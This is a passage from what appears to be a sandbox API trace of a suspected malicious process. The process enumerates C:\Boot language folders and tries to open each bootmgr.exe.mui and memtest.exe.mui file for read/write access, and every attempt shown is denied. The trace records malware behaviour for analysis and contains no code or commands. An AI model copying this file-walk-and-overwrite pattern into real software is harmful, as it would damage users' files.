cAlternateFileName="BCD~1.LOG")) returned 1 [0129.313] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0129.313] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0129.313] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0129.313] GetProcessHeap () returned 0x550000 [0129.313] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.313] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.321] GetProcessHeap () returned 0x550000 [0129.322] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.322] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.322] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.322] GetProcessHeap () returned 0x550000 [0129.322] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.322] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.322] GetLastError () returned 0x5 [0129.323] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.323] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.323] GetProcessHeap () returned 0x550000 [0129.323] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.323] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0129.323] GetProcessHeap () returned 0x550000 [0129.323] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.323] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.323] GetProcessHeap () returned 0x550000 [0129.323] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.323] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.323] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.323] GetProcessHeap () returned 0x550000 [0129.324] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.324] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.483] GetLastError () returned 0x5 [0129.483] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.483] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.483] GetProcessHeap () returned 0x550000 [0129.483] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.483] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0129.483] GetProcessHeap () returned 0x550000 [0129.483] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.484] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.484] GetProcessHeap () returned 0x550000 [0129.484] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.484] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.484] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.484] GetProcessHeap () returned 0x550000 [0129.484] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.484] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.485] GetLastError () returned 0x5 [0129.485] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.485] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.485] GetProcessHeap () returned 0x550000 [0129.485] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.485] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0129.485] GetProcessHeap () returned 0x550000 [0129.485] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.485] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.485] GetProcessHeap () returned 0x550000 [0129.485] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.485] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.485] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.485] GetProcessHeap () returned 0x550000 [0129.486] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.486] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.709] GetLastError () returned 0x5 [0129.709] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.709] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.710] GetProcessHeap () returned 0x550000 [0129.710] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.710] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-US", cAlternateFileName="")) returned 1 [0129.710] GetProcessHeap () returned 0x550000 [0129.710] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.710] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.710] GetProcessHeap () returned 0x550000 [0129.710] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.710] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.710] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.710] GetProcessHeap () returned 0x550000 [0129.710] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.710] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.710] GetLastError () returned 0x5 [0129.710] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0129.710] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.711] GetLastError () returned 0x5 [0129.711] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0129.711] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.711] GetProcessHeap () returned 0x550000 [0129.711] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.711] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0129.711] GetProcessHeap () returned 0x550000 [0129.711] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.711] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.813] GetProcessHeap () returned 0x550000 [0129.813] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.813] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.813] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.813] GetProcessHeap () returned 0x550000 [0129.813] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.813] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.813] GetLastError () returned 0x5 [0129.813] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.814] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.814] GetProcessHeap () returned 0x550000 [0129.814] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.814] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0129.814] GetProcessHeap () returned 0x550000 [0129.814] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.814] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.814] GetProcessHeap () returned 0x550000 [0129.814] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.814] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: 